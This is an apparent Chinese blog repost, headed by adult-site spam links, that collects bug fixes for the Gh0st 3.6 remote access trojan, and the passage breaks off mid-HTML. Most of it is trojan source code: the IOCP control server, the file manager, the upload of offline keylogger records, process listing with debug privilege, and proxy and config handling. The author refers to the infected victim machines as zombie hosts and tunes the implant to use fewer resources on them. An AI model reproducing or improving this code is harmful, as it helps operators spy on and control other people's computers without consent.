日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Gh0st 3.6 存在的BUG及修改方法(收集整理)

發(fā)布時間:2024/4/11 编程问答 39 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Gh0st 3.6 存在的BUG及修改方法(收集整理) 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

以下貼出代碼全部為修改后的

---------------------------------------------------------------------------------------------------------------------------------

1.拖放文件上傳和下載時,有選擇目標目錄的話,可能會使目錄重復

修改CFileManagerDlg::SendUploadJob()和CFileManagerDlg::CreateLocalRecvFile()中的代碼:

if (m_Remote_Upload_Job.IsEmpty())
?? return FALSE;

CString strDestDirectory = m_Remote_Path;
// 如果遠程也有選擇,當做目標文件夾
int nItem = m_list_remote.GetSelectionMark();

// 是文件夾
if (!m_hCopyDestFolder.IsEmpty())//修改目錄重復的bug
{
?? strDestDirectory += m_hCopyDestFolder + "\\";
}else if (nItem != -1 && m_list_remote.GetItemData(nItem) == 1) // 是文件夾
{
?? strDestDirectory += m_list_remote.GetItemText(nItem, 0) + "\\";
}//新修改

if (!m_hCopyDestFolder.IsEmpty())
{
?? strDestDirectory += m_hCopyDestFolder + "\\";
}

// 發(fā)出第一個下載任務命令

------------------------------------------------------------------------------------------------------------------------------------

2.?選中多個主機,執(zhí)行斷開連接,并不是所有選擇的都斷開

Ccb1stView::OnDisconnect() 中代碼改為
??????? POSITION pos;
??????? for(; pos=m_pListCtrl->GetFirstSelectedItemPosition();)
??????? {
??????????????? m_pListCtrl->DeleteItem(m_pListCtrl->GetNextSelectedItem(pos));
??????? }

------------------------------------------------------------------------------------------------------------------------------------

3.文件列表不支持點擊排序

在FileManagerDlg.h中加上一句:
#define CListCtrl CCJListCtrl

--------------------------------------------------------------------------------------------------------------------------------------

4.內(nèi)存泄露BUG修改

1)、內(nèi)存泄漏
如new后沒有delete,或其他內(nèi)存分配函數(shù)后沒有配對釋放,例如:
void SplitLoginInfo(…)中、DWORD GetProcessID(LPCTSTR lpProcessName)中…
另外如用

[Copy to clipboard] [ - ]CODE:
char *lpBuffer = new char[dwSize]
這種形式new,后面應該

[Copy to clipboard] [ - ]CODE:
delete [] lpBuffer;
,如果只是delete lpBuffer應該也會造成泄漏,例如:
int CKeyboardManager::sendOfflineRecord()中…
2)、句柄泄漏
大多是由于沒有CloseHandle所致,某些特殊對象有相應的關閉釋放函數(shù),雖然問題不大,可看到肉雞每次接受命令執(zhí)行,就增加一些句柄或其他資源占用,心里總是不爽。
例如:

[Copy to clipboard] [ - ]CODE:
LPBYTE CSystemManager::getProcessList()中OpenProcess后應該CloseHandle(hProcess);

[Copy to clipboard] [ - ]CODE:
DWORD GetProcessID(LPCTSTR lpProcessName)中最后應該CloseHandle(handle);

//新加入減少內(nèi)存泄露//1
void SplitLoginInfo(char *lpDecodeString, char **lppszHost, LPDWORD lppPort, char **lppszProxyHost, LPDWORD

lppProxyPort,
??????????????????????????????????? char **lppszProxyUser, char **lppszProxyPass)
{
?????? *lppszHost = NULL;
?????? *lppPort = 0;
?????? *lppszProxyHost = NULL;
?????? *lppProxyPort = 0;
?????? *lppszProxyUser = NULL;
?????? *lppszProxyPass = NULL;

?????? bool??????? bIsProxyUsed = false;
?????? bool??????? bIsAuth = false;
?????? UINT??????? nSize = lstrlen(lpDecodeString) + 1;
?????? char??????? *lpString = new char[nSize];
?????? memcpy(lpString, lpDecodeString, nSize);
??????
?????? char??????? *pStart, *pNext, *pEnd;
?????? *lppszHost = lpString;

?????? if ((pStart = strchr(lpString, ':')) == NULL)
??????????? return;

?????? *pStart = '\0';
?????? if ((pNext = strchr(pStart + 1, '|')) != NULL)
?????? {
??????????? bIsProxyUsed = true;
??????????? *pNext = '\0';
?????? }
?????? *lppPort = atoi(pStart + 1);
??????
?????? if (!bIsProxyUsed)
??????????? return;

?????? pNext++;
?????? *lppszProxyHost = pNext;

?????? if ((pStart = strchr(pNext, ':')) == NULL)
??????????? return;

?????? *pStart = '\0';
?????? if ((pNext = strchr(pStart + 1, '|')) != NULL)
?????? {
??????????? bIsAuth = true;
??????????? *pNext = '\0';
?????? }
?????? *lppProxyPort = atoi(pStart + 1);
??????
?????? if (!bIsAuth)
??????????? return;
??????
?????? pNext++;
?????? *lppszProxyUser = pNext;
?????? if ((pStart = strchr(pNext, ':')) == NULL)
??????????? return;
?????? *pStart = '\0';
?????? *lppszProxyPass = pStart + 1;
?????? delete [] lpString ;//新加入減少內(nèi)存泄露?
}


//2

int CKeyboardManager::sendOfflineRecord()
{
?????? int???????????? nRet = 0;
?????? DWORD??????? dwSize = 0;
?????? DWORD??????? dwBytesRead = 0;
?????? char??????? strRecordFile[MAX_PATH];
?????? GetSystemDirectory(strRecordFile, sizeof(strRecordFile));
?????? lstrcat(strRecordFile, "");
?????? HANDLE??????? hFile = CreateFile(strRecordFile, GENERIC_READ, FILE_SHARE_READ,
??????????? NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
?????? if (hFile != INVALID_HANDLE_VALUE)
?????? {
??????????? dwSize = GetFileSize(hFile, NULL);
??????????? char *lpBuffer = new char[dwSize];
??????????? ReadFile(hFile, lpBuffer, dwSize, &dwBytesRead, NULL);
??????????? // 解密
??????????? for (int i = 0; i < dwSize; i++)
???????????????????? lpBuffer ^= XOR_ENCODE_VALUE;
??????????? nRet = sendKeyBoardData((LPBYTE)lpBuffer, dwSize);
??????????? delete [] lpBuffer; //??? delete lpBuffer;新修改的代碼
?????? }
?????? CloseHandle(hFile);
?????? return nRet;
}


//

LPBYTE CSystemManager::getProcessList()
{
?????? HANDLE????????????????????? hSnapshot = NULL;
?????? HANDLE????????????????????? hProcess = NULL;
?????? HMODULE????????????????????? hModules = NULL;
?????? PROCESSENTRY32??????? pe32 = {0};
?????? DWORD????????????????????? cbNeeded;
?????? char????????????????????? strProcessName[MAX_PATH] = {0};
?????? LPBYTE????????????????????? lpBuffer = NULL;
?????? DWORD????????????????????? dwOffset = 0;
?????? DWORD????????????????????? dwLength = 0;
?????? DebugPrivilege(SE_DEBUG_NAME, TRUE);
??????
?????? hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
??????
?????? if(hSnapshot == INVALID_HANDLE_VALUE)
??????????? return NULL;
??????
?????? pe32.dwSize = sizeof(PROCESSENTRY32);
??????
?????? lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1024);
??????
?????? lpBuffer[0] = TOKEN_PSLIST;
?????? dwOffset = 1;
??????
?????? if(Process32First(hSnapshot, &pe32))
?????? {???????
??????????? do
??????????? {????
???????????????????? hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE,

pe32.th32ProcessID);
???????????????????? if ((pe32.th32ProcessID !=0 ) && (pe32.th32ProcessID != 4) && (pe32.th32ProcessID != 8))
???????????????????? {
?????????????????????????????? EnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded);
?????????????????????????????? GetModuleFileNameEx(hProcess, hModules, strProcessName, sizeof(strProcessName));
??????????????????????????????
?????????????????????????????? // 此進程占用數(shù)據(jù)大小
?????????????????????????????? dwLength = sizeof(DWORD) + lstrlen(pe32.szExeFile) + lstrlen(strProcessName) + 2;
?????????????????????????????? // 緩沖區(qū)太小,再重新分配下
?????????????????????????????? if (LocalSize(lpBuffer) < (dwOffset + dwLength))
??????????????????????????????????? lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength),

LMEM_ZEROINIT|LMEM_MOVEABLE);
??????????????????????????????
?????????????????????????????? memcpy(lpBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD));
?????????????????????????????? dwOffset += sizeof(DWORD);???????
??????????????????????????????
?????????????????????????????? memcpy(lpBuffer + dwOffset, pe32.szExeFile, lstrlen(pe32.szExeFile) + 1);
?????????????????????????????? dwOffset += lstrlen(pe32.szExeFile) + 1;
??????????????????????????????
?????????????????????????????? memcpy(lpBuffer + dwOffset, strProcessName, lstrlen(strProcessName) + 1);
?????????????????????????????? dwOffset += lstrlen(strProcessName) + 1;
???????????????????? }
??????????? CloseHandle(hProcess);//新修改
??????????? }
??????????? while(Process32Next(hSnapshot, &pe32));
?????? }
??????
?????? lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
??????
?????? DebugPrivilege(SE_DEBUG_NAME, FALSE);?
?????? CloseHandle(hSnapshot);
?????? return lpBuffer;???????
}
//
DWORD GetProcessID(LPCTSTR lpProcessName)
{
?????? DWORD RetProcessID = 0;
?????? HANDLE handle=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
?????? PROCESSENTRY32* info=new PROCESSENTRY32;
?????? info->dwSize=sizeof(PROCESSENTRY32);
??????
?????? if(Process32First(handle,info))
?????? {
??????????? if (strcmpi(info->szExeFile,lpProcessName) == 0)
??????????? {
???????????????????? RetProcessID = info->th32ProcessID;
???????????????????? return RetProcessID;
??????????? }
??????????? while(Process32Next(handle,info) != FALSE)
??????????? {
???????????????????? if (lstrcmpi(info->szExeFile,lpProcessName) == 0)
???????????????????? {
?????????????????????????????? RetProcessID = info->th32ProcessID;
?????????????????????????????? return RetProcessID;
????????????
???????????????????? }
??????????? }
?????? }

CloseHandle(handle);//新修改

return RetProcessID;
???????
}

新修改
bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
{
DWORD dwLength = 0;
DWORD dwOffset = 0;
DWORD dwProcessID = 0;
LPBYTE lpBuffer = *(LPBYTE *)lParam;
char strTitle[1024]={0};
try
{
GetWindowText(hwnd, strTitle, sizeof(strTitle)-1);
strTitle[sizeof(strTitle)-1]=0;
if (!IsWindowVisible(hwnd) || lstrlen(strTitle) == 0)
return true;
if (lpBuffer == NULL)
{
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1);
dwOffset=1;
}else
{
dwOffset = LocalSize(lpBuffer);
while(*(lpBuffer + dwOffset - 2)==0) dwOffset--;
}

dwLength = sizeof(DWORD) + lstrlen(strTitle) + 1;
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE);
}catch (...)
{
return true;
}
GetWindowThreadProcessId(hwnd, (LPDWORD)(lpBuffer + dwOffset));
memcpy(lpBuffer + dwOffset + sizeof(DWORD), strTitle, lstrlen(strTitle) + 1);

*(LPBYTE *)lParam = lpBuffer;
return true;
}

/
LPCTSTR FindConfigString(HMODULE hModule, LPCTSTR lpString)
{
?????? char??????? strFileName[MAX_PATH];
?????? char??????? *lpConfigString = NULL;
?????? DWORD??????? dwBytesRead = 0;
?????? GetModuleFileName(hModule, strFileName, sizeof(strFileName));
??????
?????? HANDLE??????? hFile = CreateFile(strFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
?????? if (hFile == INVALID_HANDLE_VALUE)
?????? {
??????????? return NULL;
?????? }
??????
?????? SetFilePointer(hFile, -MAX_CONFIG_LEN, NULL, FILE_END);
?????? lpConfigString = new char[MAX_CONFIG_LEN];
?????? ReadFile(hFile, lpConfigString, MAX_CONFIG_LEN, &dwBytesRead, NULL);
?????? CloseHandle(hFile);
??????
?????? int offset = memfind(lpConfigString, lpString, MAX_CONFIG_LEN, 0);
?????? if (offset == -1)
?????? {
??????????? delete lpConfigString;
??????????? return NULL;
?????? }
?????? else
?????? {
??????????? return lpConfigString + offset;
??????????? delete lpConfigString;///新修改代碼-----------不確定.
?????? }
}
// 文件名隨機

------------------------------------------------------------------------------------------------------------------------------------

5.對話框關閉后未銷毀的問題(spy++可以看到)

??????? 在CGh0stView::OnRemoveFromList(WPARAM wParam, LPARAM lParam)中有調(diào)用DestroyWindow,只要在OnClose中注釋掉m_pContext->m_Dialog[0] = 0;

???????? 在工程中搜索m_pContext->m_Dialog[0] = 0;共搜到七處,全部注釋掉后,測試時第二次進入文件管理的時候掉圖標。不注釋的話,又導致spy++可以看到文件管理窗口。歡迎高手提供好的解決辦法。
也就是下面代碼里的m_pContext->m_Dialog[0] = 0;不能注釋,其他六處可以注釋。
void CFileManagerDlg::OnClose()?
{
// TODO: Add your message handler code here and/or call default
CoUninitialize();
m_pContext->m_Dialog[0] = 0;
closesocket(m_pContext->m_Socket);
CDialog::OnClose();
}

------------------------------------------------------------------------------------------------------------------------------------

6.發(fā)送數(shù)據(jù)較快容易出錯

pContext->m_hWriteComplete

這明顯是個event對象,可是并沒有CreateEvent創(chuàng)建,單線程發(fā)送接收可能沒事,發(fā)送數(shù)據(jù)較快就有問題了(我加代理功能時發(fā)現(xiàn),CreateEvent后發(fā)的數(shù)據(jù)就不亂了)

------------------------------------------------------------------------------------------------------------------------------------

7.Gh0st3.6 IOCP發(fā)送BUG

作 者:?boywhp
時 間:?2014-04-21,22:53:46
鏈 接:?http://bbs.pediy.com/showthread.php?t=186833

測試發(fā)現(xiàn)有時客戶端會發(fā)送重復數(shù)據(jù)包,感覺作者的IOCP發(fā)送處理邏輯不是太清晰,簡單修改了下,初步測試沒發(fā)現(xiàn)異常
話說我很想不通使用了TCP通信的Gh0st里面居然還有處理重發(fā)的代碼,真是蛋疼啊,懶得刪了,萬一有個大坑呢?
另外里面頻繁的new?delete看得我也很不爽啊,不過我忍住了,能不動就不動
1、CIOCPServer::Send
代碼: [cpp]?view plain?copy
  • void?CIOCPServer::Send(ClientContext*?pContext,?LPBYTE?lpData,?UINT?nSize)??
  • {??
  • ??if?(pContext?==?NULL)??
  • ????return;??
  • ??????????
  • ??try??
  • ??{??
  • ????????????????CLock?cs(pContext->m_SndLock,?"Send");??
  • ????if?(nSize?>?0)??
  • ????{??
  • ??????//?Compress?data??
  • ??????unsigned?long??destLen?=?(double)nSize?*?1.001??+?12;??
  • ??????LPBYTE??????pDest?=?new?BYTE[destLen];??
  • ??????int??nRet?=?compress(pDest,?&destLen,?lpData,?nSize);??
  • ????????
  • ??????if?(nRet?!=?Z_OK)??
  • ??????{??
  • ????????delete?[]?pDest;??
  • ????????return;??
  • ??????}??
  • ??
  • ??????//??
  • ??????LONG?nBufLen?=?destLen?+?HDR_SIZE;??
  • ??????//?5?bytes?packet?flag??
  • ??????pContext->m_WriteBuffer.Write(m_bPacketFlag,?sizeof(m_bPacketFlag));??
  • ??????//?4?byte?header?[Size?of?Entire?Packet]??
  • ??????pContext->m_WriteBuffer.Write((PBYTE)?&nBufLen,?sizeof(nBufLen));??
  • ??????//?4?byte?header?[Size?of?UnCompress?Entire?Packet]??
  • ??????pContext->m_WriteBuffer.Write((PBYTE)?&nSize,?sizeof(nSize));??
  • ??????//?Write?Data??
  • ??????pContext->m_WriteBuffer.Write(pDest,?destLen);??
  • ??????delete?[]?pDest;??
  • ????????
  • ??????//?如果當前緩沖區(qū)無數(shù)據(jù)堆積,執(zhí)行PostSend??
  • ??????if?(pContext->m_WriteBuffer.GetBufferLen()?==?nBufLen)??
  • ????????PostSend(pContext);??
  • ??
  • ??????//?發(fā)送完后,再備份數(shù)據(jù),?因為有可能是m_ResendWriteBuffer本身在發(fā)送,所以不直接寫入??
  • ??????LPBYTE?lpResendWriteBuffer?=?new?BYTE[nSize];??
  • ??????CopyMemory(lpResendWriteBuffer,?lpData,?nSize);??
  • ??????pContext->m_ResendWriteBuffer.ClearBuffer();??
  • ??????pContext->m_ResendWriteBuffer.Write(lpResendWriteBuffer,?nSize);??//?備份發(fā)送的數(shù)據(jù)??
  • ??????delete?[]?lpResendWriteBuffer;??
  • ????}??
  • ????else?//?要求重發(fā)??
  • ????{??
  • ??????pContext->m_WriteBuffer.Write(m_bPacketFlag,?sizeof(m_bPacketFlag));??
  • ??????pContext->m_ResendWriteBuffer.ClearBuffer();??
  • ??????pContext->m_ResendWriteBuffer.Write(m_bPacketFlag,?sizeof(m_bPacketFlag));??//?備份發(fā)送的數(shù)據(jù)????
  • ????}??
  • ??
  • ?????//OVERLAPPEDPLUS?*?pOverlap?=?new?OVERLAPPEDPLUS(IOWrite);??
  • ?????//PostQueuedCompletionStatus(m_hCompletionPort,?0,?(DWORD)?pContext,?&pOverlap->m_ol);??
  • ??
  • ????pContext->m_nMsgOut++;??
  • ??}catch(...){}??
  • }??
  • 2、添加函數(shù)CIOCPServer::PostSend
    代碼: [cpp]?view plain?copy
  • void?CIOCPServer::PostSend(ClientContext*?pContext)??
  • {??
  • ??OVERLAPPEDPLUS?*?pOverlap?=?new?OVERLAPPEDPLUS(IOWrite);??
  • ??WSABUF?sndBuf;??
  • ??ULONG?ulFlags?=?MSG_PARTIAL;??
  • ????
  • ??m_pNotifyProc((LPVOID)?m_pFrame,?pContext,?NC_TRANSMIT);??
  • ????
  • ??sndBuf.buf?=?(char*)?pContext->m_WriteBuffer.GetBuffer();??
  • ??sndBuf.len?=?pContext->m_WriteBuffer.GetBufferLen();??
  • ????
  • ??int?nRetVal?=?WSASend(pContext->m_Socket,???
  • ????&sndBuf,??
  • ????1,??
  • ????&sndBuf.len,???
  • ????ulFlags,??
  • ????&pOverlap->m_ol,???
  • ????NULL);??
  • ????
  • ??if?(nRetVal?==?SOCKET_ERROR?&&?WSAGetLastError()?!=?WSA_IO_PENDING)??
  • ????RemoveStaleClient(?pContext,?FALSE?);??
  • }??

  • 3、CIOCPServer::OnClientWriting
    代碼: [cpp]?view plain?copy
  • bool?CIOCPServer::OnClientWriting(ClientContext*?pContext,?DWORD?dwIoSize)??
  • {??
  • ??try??
  • ??{??
  • ????//??
  • ????static?DWORD?nLastTick?=?GetTickCount();??
  • ????static?DWORD?nBytes?=?0;??
  • ??????
  • ????nBytes?+=?dwIoSize;??
  • ??????
  • ????if?(GetTickCount()?-?nLastTick?>=?1000)??
  • ????{??
  • ??????nLastTick?=?GetTickCount();??
  • ??????InterlockedExchange((LPLONG)&(m_nSendKbps),?nBytes);??
  • ??????nBytes?=?0;??
  • ????}??
  • ????//??
  • ?????????????????
  • ????????????????TRACE("IOCP?Send?DONE?%d?bytes?Remain:%d?bytes\n",???
  • ??????dwIoSize,???
  • ??????pContext->m_WriteBuffer.GetBufferLen());??
  • ??
  • ????//?Finished?writing?-?tidy?up??
  • ????????????????if?(dwIoSize?>?0){??
  • ????????????pContext->m_WriteBuffer.Delete(dwIoSize);??
  • ??????if?(pContext->m_WriteBuffer.GetBufferLen()?>?0)??
  • ????????PostSend(pContext);??
  • ??????else??
  • ????????pContext->m_WriteBuffer.ClearBuffer();??
  • ????????????????}??
  • ??
  • ??}catch(...){}??
  • ??return?false;??????//?issue?new?read?after?this?one??
  • }??

  • ------------------------------------------------------------------------------------------------------------------------------------

    8.SetPaneText 的崩潰問題

    ??這個應該屬于多線程操作控件的問題,參見MFC不能多線程操作控件的原因?這里面講解的比較深入了。?
    關于狀態(tài)欄StatusBar有幾點需要說明:?
    1)剛剛創(chuàng)建工程 CMainFrame 類里面就有一個?CMFCStatusBar m_wndStatusBar;?狀態(tài)欄變量定義。在原版工程里面是CStatusBar m_wndStatusBar;?
    2)在這個類的 OnCreate 函數(shù)里面調(diào)用?m_wndStatusBar.SetPaneInfo(0, m_wndStatusBar.GetItemID(0), SBPS_STRETCH , 300);?設置每個狀態(tài)欄分割寬度,后面兩個參數(shù) SBPS_STRETCH 表示 剩余的寬度都算在這個分割里面,300表示最小寬度,MSDN文檔。?
    3)關于 CMFCStatusBar 使用方法可見 雞啄米專欄?VS2010/MFC編程入門之三十八(狀態(tài)欄的使用詳解)?。?
    4)gh0st里面是這樣使用?m_wndStatusBar?的:

    <code class="language-C hljs lasso has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;"><span class="hljs-literal" style="color: rgb(0, 102, 102); box-sizing: border-box;">void</span> CIOCPServer<span class="hljs-tag" style="color: rgb(0, 102, 102); box-sizing: border-box;">::OnAccept</span>() { m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_CLIENT_CONNECT); } <span class="hljs-literal" style="color: rgb(0, 102, 102); box-sizing: border-box;">void</span> CALLBACK CMainFrame<span class="hljs-tag" style="color: rgb(0, 102, 102); box-sizing: border-box;">::NotifyProc</span>(LPVOID lpParam, ClientContext <span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">*</span>pContext, UINT nCode) { g_pFrame<span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">-></span>m_wndStatusBar<span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">.</span>SetPaneText(<span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">1</span>, str); }</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li><li style="box-sizing: border-box; padding: 0px 5px;">7</li><li style="box-sizing: border-box; padding: 0px 5px;">8</li></ul>

    當異常的時候調(diào)用棧如下:?

    跟蹤到異常位置來到系統(tǒng)代碼:

    <code class="language-C hljs lasso has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;"> <span class="hljs-comment" style="color: rgb(136, 0, 0); box-sizing: border-box;">// should also be in the permanent or temporary handle map</span> CHandleMap<span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">*</span> pMap <span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">=</span> afxMapHWND(); ASSERT(pMap <span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">!=</span> <span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">NULL</span>); CObject<span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">*</span> p<span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">=</span><span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">NULL</span>; <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">if</span>(pMap) { ASSERT( (p <span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">=</span> pMap<span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">-></span>LookupPermanent(m_hWnd)) <span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">!=</span> <span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">NULL</span> <span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">||</span> (p <span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">=</span> pMap<span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">-></span>LookupTemporary(m_hWnd)) <span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">!=</span> <span class="hljs-built_in" style="color: rgb(102, 0, 102); box-sizing: border-box;">NULL</span>); }</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li><li style="box-sizing: border-box; padding: 0px 5px;">7</li><li style="box-sizing: border-box; padding: 0px 5px;">8</li><li style="box-sizing: border-box; padding: 0px 5px;">9</li><li style="box-sizing: border-box; padding: 0px 5px;">10</li></ul>

    總之一句話,這個 SetPaneText 是從其它線程 ListenThreadProc 調(diào)用過來的,如果要正常使用可以修改為如下方式 :

    <code class="language-C hljs lasso has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;"><span class="hljs-literal" style="color: rgb(0, 102, 102); box-sizing: border-box;">void</span> CALLBACK CMainFrame<span class="hljs-tag" style="color: rgb(0, 102, 102); box-sizing: border-box;">::NotifyProc</span>(LPVOID lpParam, ClientContext <span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">*</span>pContext, UINT nCode) { g_pFrame<span class="hljs-subst" style="color: rgb(0, 0, 0); box-sizing: border-box;">-></span>PostMessageA(UpdatePane); }</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li></ul>

    g_pFrame 是一個 CMainFrame 類型指針,在CMainFrame 類里面加入一個消息處理過程:

    <code class="language-C hljs autohotkey has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;"><span class="hljs-label" style="box-sizing: border-box;">ON_MESSAGE(UpdatePane, &CMainFrame::</span>OnUpdatepane) <span class="hljs-label" style="box-sizing: border-box;">afx_msg LRESULT CMainFrame::</span>OnUpdatepane(WPARAM wParam, LPARAM lParam) { m_wndStatusBar.SetPaneText(<span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">1</span>, <span class="hljs-string" style="color: rgb(0, 136, 0); box-sizing: border-box;">"test"</span>)<span class="hljs-comment" style="color: rgb(136, 0, 0); box-sizing: border-box;">;</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">return</span> <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">0</span><span class="hljs-comment" style="color: rgb(136, 0, 0); box-sizing: border-box;">;</span> }</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li></ul>

    ??在 ListenThreadProc 向 CMainFrame 類發(fā)送一個消息 PostMessage(UpdatePane),然后在 CMainFrame 類里面處理這個消息,至此問題完美解決。?
    參考:?
    MFC中從一個類向其他類發(fā)送消息的方法

    ------------------------------------------------------------------------------------------------------------------------------------

    9.WSAIoctl 參數(shù)類型導致棧異常

    以前gh0st代碼如下:

    <code class="language-C hljs objectivec has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;"> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">const</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">char</span> chOpt = <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">1</span>; WSAIoctl ( pContext->m_Socket, SIO_KEEPALIVE_VALS, &klive, <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">sizeof</span>(tcp_keepalive), <span class="hljs-literal" style="color: rgb(0, 102, 102); box-sizing: border-box;">NULL</span>, <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">0</span>, (<span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">unsigned</span> <span class="hljs-keyword" style="color: rgb(0, 0, 136); box-sizing: border-box;">long</span> *)&chOpt, <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">0</span>, <span class="hljs-literal" style="color: rgb(0, 102, 102); box-sizing: border-box;">NULL</span> );</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li><li style="box-sizing: border-box; padding: 0px 5px;">7</li><li style="box-sizing: border-box; padding: 0px 5px;">8</li><li 